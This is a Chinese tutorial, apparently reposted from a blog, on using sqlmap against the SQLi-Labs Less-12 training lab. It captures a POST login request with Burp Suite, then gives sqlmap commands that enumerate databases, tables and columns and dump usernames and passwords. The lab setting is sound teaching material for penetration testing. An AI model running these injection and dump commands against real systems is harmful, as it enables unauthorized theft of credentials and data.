SQLMAP进阶使用

编程入门 行业动态 更新时间:2024-10-23 21:24:52

SQLMAP<a href=https://www.elefans.com/category/jswz/34/1769503.html style=进阶使用"/>

SQLMAP进阶使用

实验原理

使用SQLMAP对存在POST注入点的网站进行自动化注入时,通常可以采用以下简便方法:利用Burpsuite抓包并保存HTTP request至文本文档,再利用sqlmap -r命令从文本文档中读取HTTP request并实施注入。
注入时,可以利用--technique参数指定SQLMAP使用的探测技术:B表示布尔盲注,T表示时间盲注(延迟注入),E表示报错注入,U表示联合查询注入,S表示堆查询注入;利用-v参数指定显示等级,当取值大于等于3时,将显示SQLMAP所使用的payload 详情。

1.访问SQLi-Labs网站

访问Less-12

http://192.168.5.116/sqli-labs/Less-12/

2.利用Burpsuite工具抓包

1)启动Burpsuite并设置代理服务端口

2)设置Firefox代理

 注意:端口要一致

3)开启 Burpsuite的代理拦截功能

 4)利用Burpsuite工具拦截HTTP请求包

输入用户名admin,密码任意,点击Submit登录,此时Burpsuite会拦截到HTTP请求包

 5)将请求包内容拷贝至D:\1.txt中

3.启动SQLMAP

进入sqlmap目录,在搜索框输入cmd,并回车

 4.寻找注入点

python sqlmap.py -r D:\1.txt --technique "U" -v 3

其中,--technique"U"表示使用基于联合查询的技术;-v表示显示等级,当取值大于等于3时,将显示SQLMAP检测过程中所使用的payload详情。

 

 检测结果

5.获取数据库的库名 

 1)获取所有数据库的库名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 --dbs

 2)获取当前数据库的库名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 --current-db

 6.获取security数据库中的所有表名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security --tables

其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users --columns

 

8.获取users表id,username和password字段的全部值

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users -C id,username,password --dump

 

更多推荐

SQLMAP进阶使用

本文发布于:2024-03-09 10:58:41,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1724791.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:进阶   SQLMAP

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!